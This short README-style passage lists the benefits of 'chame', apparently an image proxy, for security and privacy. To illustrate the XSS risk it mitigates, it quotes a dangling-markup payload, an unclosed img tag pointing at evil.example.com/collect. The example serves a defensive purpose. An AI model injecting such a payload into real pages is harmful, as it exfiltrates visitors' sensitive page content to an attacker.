Why use chame?

  • You can enfoce restrictive Content-Security-Policy with img-src that contains only chame (and your CDNs).
  • You can protect sensitive data from XSS.
    • For example, without chame, if an evil visitor succeeded to embed HTML snippet like <img src="https://evil.example.com/collect?data=, following HTML content on that page until next double-quote maybe sent to evil.example.com.
  • You can protect your visitor's privacy (IP address, User-Agent etc.) from unknown parties. chame accesses the original image behalf of your visitor.
  • You can avoid Mixed-Content probelm even with HTTP image (maybe provided by your visitor) by proxying with chame on HTTPS.
  • You can enforce what image your visitor can embed by issuing chame signed URLs only to origins in your white list.
